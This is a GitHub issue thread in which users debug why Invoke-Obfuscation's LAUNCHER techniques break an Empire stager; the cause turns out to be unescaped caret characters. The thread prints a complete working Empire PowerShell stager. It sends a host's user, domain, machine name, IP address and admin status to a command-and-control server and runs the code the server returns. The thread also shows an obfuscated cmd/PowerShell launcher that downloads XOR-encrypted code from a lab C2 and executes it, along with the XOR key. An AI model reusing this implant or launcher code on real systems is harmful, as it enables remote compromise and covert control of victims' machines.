Closed cobbr closed 7 years ago
cobbr
commented
7 years ago Did some more research into this. Looks like it traces back to an issue with String TOKEN obfuscation. Disabling the string TOKEN obfuscation while doing LAUNCHER obfuscation leads to all of the mentioned LAUNCHER obfuscation techniques to work.
If I am able to narrow this down to a more specific issue, I will report back.
danielbohannon
commented
7 years ago I have not been able to reproduce this bug. Can you provide me with the encrypted Empire script that is eventually being invoked after the BXOR step?
cobbr
commented
7 years ago Here's a fresh example for you.
Here is the pre-encryption Empire stager:
fUNcTion StART-NEGOtiaTe{param($s,$SK,$UA="lol")ADD-Type -asseMBlY SYsteM.SeCUrItY;Add-TyPE -AssEMBlY SYsTEM.CORe;$ErrorActionPreference = "SilentlyContinue";$e=[SySTem.TExt.EncodiNg]::ASCII;$AES=NEw-OBjEcT SYSteM.SECURITY.CryptOGrAphY.AeSCrYPToSERVicEPROVIDer;$IV = [bYte] 0..255 | GET-RANdOM -CoUnT 16;$AES.Mode="CBC"; $AES.Key=$e.GetBytes($SK); $AES.IV = $IV;$cSp = New-OBjEct SyStEM.SECUrITY.CryPTogRapHY.CspPArAMETeRS;$csP.FLaGS = $Csp.FlAGs -bOR [SyStem.SEcuriTY.CrypTOGrApHy.CspPROViDERFLaGs]::UseMACHineKEyStoRE;$Rs = New-ObjeCt SYstEM.SEcurITy.CrYPTOgrAPHY.RSACRYPtoSerVIcePRoVidER -ARgUMEntList 2048,$CSp;$Rk=$rs.ToXMLStRing($FALSe);$r=1..16|FOrEach-ObJeCt{GeT-RaNdom -MAx 26};$ID=('ABCDEFGHKLMNPRSTUVWXYZ123456789'[$r] -JoIn '');$ib=$e.getbytEs($rk);$EB=$IV+$AES.CreATEEnCRyptOr().TRaNSFoRmFinAlBLoCk($ib,0,$ib.LeNGth);IF(-not $WC){$Wc=NEw-objEcT SYsTEM.nET.WEBCLIent;$WC.PRoxY = [SySTem.NET.WebReQUesT]::GeTSyStEmWeBPRoXY();$Wc.PROXy.CrEDENTiaLS = [SyStEm.NET.CrEDENtiAlCAcHE]::DEfAulTCREDeNtIAls;}$wc.Headers.Add("User-Agent",$UA);$wc.Headers.Add("Cookie","SESSIONID=$ID");$raw=$wc.UploadData($s+"index.jsp","POST",$eb);$de=$e.GEtStRING($RS.DeCrYpT($RaW,$FAlsE));$EpoCh=$de[0..9] -join'';$Key=$de[10..$de.LenGTh] -jOIN '';$AES=New-Object SYSTEm.SEcurITY.CRYptoGRaphy.AESCrYPTOSeRvicePRovIDer;$IV = [BYtE] 0..255 | GeT-RandOM -CoUNt 16;$AES.Mode="CBC"; $AES.Key=$e.GetBytes($key); $AES.IV = $IV;$i=$S+'|'+[EnVironmENt]::USERDomaiNNAME+'|'+[EnVIrONMent]::USERNamE+'|'+[ENViroNMent]::MAchineNAmE;$P=(Gwmi WIN32_NeTWoRkADapTeRCoNFIgURatiON|WhERe{$_.IPAdDress}|SELeCt -EXPAND IPADDrEss);$ip = @{$TRUe=$P[0];$fALSE=$P}[$p.LEngth -Lt 6];If(!$Ip -or $ip.trIM() -EQ '') {$iP='0.0.0.0'};$i+="|$ip";$i+='|'+(Get-WMiObjEct WIN32_OPeRaTInGSYSTeM).NAMe.splIT('|')[0];if(([Environment]::UserName).ToLower() -eq "system"){$i+='|True'}else {$i += "|" +([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")}$N=[SYstEm.DiaGNOStics.PROceSS]::GeTCuRrENtPROCESS();$i+='|'+$n.PROCeSSNAmE+'|'+$n.Id;$I += '|' + $PSVErsIonTABLe.PSVeRSiON.MAjOR;$iB2=$e.getbyTEs($i);$eb2=$IV+$AES.CrEaTeENCRyPtor().TRAnSFormFiNAlBlOck($iB2,0,$IB2.LEnGTh);$wc.Headers.Add("User-Agent",$UA);$raw=$wc.UploadData($s+"index.php","POST",$eb2);$AES=New-Object SySTeM.SEcURity.CrYPTogrAPhy.AEsCrYPtOSERViceProviDer;$AES.Mode="CBC";$IV = $raw[0..15];$AES.Key=$E.GetByTes($keY);$AES.IV = $IV;IEX $([SYSteM.TeXT.EncOdINg]::ASCII.GetStriNg( $($AES.CreaTEDEcRyPTOR().TRaNsfoRMFiNaLBLocK($RaW[16..$RAw.LEnGth],0,$RaW.LENGTH-16))));$AES=$nULL;$S2=$Null;$WC=$NUlL;$eb2=$nulL;$RAw=$nuLl;$IV=$NUlL;$WC=$nuLL;$i=$nulL;$iB2=$nULL;[GC]::COlLect();Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -SessionKey $key -SessionID $ID -Epoch $epoch;} Start-Negotiate -s "http://192.168.1.79:8080/" -SK '^)tT]PZ8l&H-J\=/f@L(kox!hC?E$nRO' -UA $u;The encrypted Empire stager is attached as a file. (Binary doesn't print well. It's attached as a .txt, because that is what Github supports. Keep in mind it is a binary file. Also keep in mind that this is technically a malicious payload (anyone reading, please don't run!), although it calls back to a 192.168.X, so you are safe.) encrypted_stager.txt
The python code responsible for encryption:
def xor_encrypt(text,key):
"""
XOR the given text input with the specified key.
"""
return "".join(chr(ord(x)^ord(y))for x,y in zip(key*len(text),text))
encrypted = encryption.xor_encrypt(randomizedStager, key)The randomizedStager is the script shown above. The key (as can be found in the same script) is: ^)tT]PZ8l&H-J\=/f@L(kox!hC?E$nRO
Let me know if I can provide anything else useful for debugging!
cobbr
commented
7 years ago The latest commit gives me the following error. This is after performing Launcher\CLIP++\57 :
C:\Windows\system32>CMd /c " echO\[SySTeM.NEt.SeRvICEPOIntMANAgEr]::ExPeCT100C
ONtINUe = 0;$WC=New-ObjEcT SyStEM.NET.WeBCLiENT;$u='Mozilla/5.0 (Windows NT 6.1;
WOW64; Trident/7.0; rv:11.0) like Gecko';$wC.HEaDerS.Add('User-Agent',$u);$WC.P
Roxy = [SyStEm.Net.WebReqUEsT]::DEfaUlTWeBPROxY;$Wc.PROxy.CrEDeNTials = [SYSTeM.
NEt.CrEdentIALCAche]::DeFAULTNeTWOrkCREDEnTIaLS;$K='^)tT]PZ8l^^^&H-J\=/f@L(kox!h
C?E$nRO';$I=0;[Char[]]$b=([chaR[]]($wC.DowNloadStrIng("http://192.168.1.79:8080/
index.asp")))^^^|%{$_-bXor$K[$i++%$k.LeNgTH]};IEX ($b-JOin'')| c:\winDoWS\SYsTem
32\CLiP&&CMd /cpoWERshELL -ST -exEcUTIoNP bYpasS -coMMa ^^^&( \"{2}{0}{1}\
" -f'yp','e',(\"{0}{1}\" -f 'Add','-T')) -Assembly ( \"{4}{3}{2}{1}{0}{6}{5}\"-f
'in','W','.','em',( \"{0}{1}\" -f'Sy','st' ),'ms',( \"{1}{0}\"-f'r','dows.Fo'))
; ${eXeCuTIoNCoNtEXT}.\"INVo`kEco`m`MA`ND\".\"iN`VOkESCRi`pt\"(( [WindOWs.fO
rMs.cLIPbOaRd]::( \"{2}{1}{0}\" -f'ExT','Ett','G').\"in`V`oke\"( ) ) ) ;
[Windows.Forms.Clipboard]::( \"{0}{2}{1}\" -f'Se','xt','tTe' ).\"iNv`OKE\"( '
' )"
Exception calling "InvokeScript" with "1" argument(s): "At line:2 char:5
+ :j=1&D§?cK+↨Mv-,P♀←‼+Q5BYQ
+ ~
The ampersand (&) character is not allowed. The & operator is reserved for
future use; wrap an ampersand in double quotation marks ("&") to pass it as
part of a string.
At line:4 char:11
+ ♦]∟§♀BGu&o/*→R↑◄.c▬Jt747F♠uHF4l hVAlU♫►O☻_>Uh¶►Lq^(▬
+ ~
The ampersand (&) character is not allowed. The & operator is reserved for
future use; wrap an ampersand in double quotation marks ("&") to pass it as
part of a string.
At line:4 char:55
+ ♦]∟§♀BGu&o/*→R↑◄.c▬Jt747F♠uHF4l hVAlU♫►O☻_>Uh¶►Lq^(▬
+ ~
Missing closing ')' in expression.
At line:5 char:10
+ N↓cbtV`k§)J▲v¶↨►&GiYyy!gL☺9k?Sqo⌂♣ r☺+z9JK+f u ⌂]K5rZ‼.}♫@"→ ...
+ ~
Unexpected token ')' in expression or statement.
At line:5 char:17
+ N↓cbtV`k§)J▲v¶↨►&GiYyy!gL☺9k?Sqo⌂♣ r☺+z9JK+f u ⌂]K5rZ‼.}♫@"→ ...
+ ~
The ampersand (&) character is not allowed. The & operator is reserved for
future use; wrap an ampersand in double quotation marks ("&") to pass it as
part of a string.
At line:5 char:56
+ ... tV`k§)J▲v¶↨►&GiYyy!gL☺9k?Sqo⌂♣ r☺+z9JK+f u ⌂]K5rZ‼.}♫@"→M☺u ...
+ ~
Unexpected token '}' in expression or statement.
At line:6 char:2
+ G&4`Vl-xk5vz♫]+`v6M|z#↓ RO<↨]$f♣u1%<L:I♀W@↔g]h"x_9"+☼☻=<kBR;☻‼;wJ ...
+ ~
The ampersand (&) character is not allowed. The & operator is reserved for
future use; wrap an ampersand in double quotation marks ("&") to pass it as
part of a string.
At line:9 char:49
+ j(6Fc^Y:♥'F1[G&YB9(▲S☻z98"c▬Wtxn↑lR.2,E1xxg↕:];H#l x868"B
+ ~
Missing closing ')' in expression.
At line:10 char:90
+ ... 9NDNqz1◄e8L!b={VfH%?S"<Q<<♠ha|S#^ hdN◄Mb*]wJJa↨27⌂rG→¶M2J‼ <n‼+RLv2: ...
+ ~
The '<' operator is reserved for future use.
At line:11 char:2
+ 2{W↔R;$h7Op9§D☼)U~♀*↓tnS1 w8s_VYYK{&4|&'t(.O$u,=x▬3 TifY
+ ~
Unexpected token '{' in expression or statement.
Not all parse errors were reported. Correct the reported errors and try
again."
At line:1 char:168
+ ... ows.Fo')) ; ${eXeCuTIoNCoNtEXT}."INVo`kEco`m`MA`ND"."iN`VOkESCRi`pt"( ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CmdletInvocationException
shellster
commented
7 years ago The issue, which I have also experienced (at least one of the issues), is that Invoke-Obfuscation is not properly escaping caret (^) symbols in your powershell. You need to go through your powershell and any place you have a caret symbol, add two. so "[^s]" should become "[^^s]".
danielbohannon
commented
7 years ago shellster, you are 100% correct. I was so focused on properly adding ^ for escaped characters that I missed that non-escape ^ characters were being removed. Thanks so much for this find. This issue should be resolved (in all affected launchers) in commit 3619e161b20a70952475c4b087d6c5c23e657321
Please add any comments if you still encounter this issue in your use cases. Thanks again to both of you! Sorry this one took so long to track down.
Problem
Several of the LAUNCHER obfuscation techniques are failing for a particular script. The actual obfuscation process produces no errors, but the script does not execute properly once obfuscated. Specifically, all of the LAUNCHER techniques with a '+' are not working for this script, while PS, CMD, and WMIC are working just fine.
I discovered this issue while trying to obfuscate stagers produced by the Empire project.
Steps to Reproduce
The contents of the file to be obfuscated: (named "launcher" in this example)
This script is a slightly modified/simplified version of an Empire launcher stager.
The Empire stager script that is downloaded via the DownloadString function in the previous script is an encrypted version of this script: (Sorry, no simplification here, but I don't think this script is relevant to the issue)
Then, obfuscate the script: (Same error for all LAUNCHER types with a '+', also same error for several powershell argument combinations I have tried)
Lastly, open a command prompt and paste in the result:
Solution
Unfortunately, I haven't quite found a solution to this bug. I know for sure that the CLIP++ launcher was working on this script prior to v1.6, so there must be some change in v1.6 that is causing the '+' launchers to break on this particular script.
I'm confident that the problem has to do with this line of the script:
You can see that it is doing some type of decryption of the downloaded script, and in the beginning of the output of the error message we can see that it is partially successful ("funCTIOn StArt-NEg") and then something goes wrong with the decryption:
Let me know if I can do anything else to help out with debugging this issue.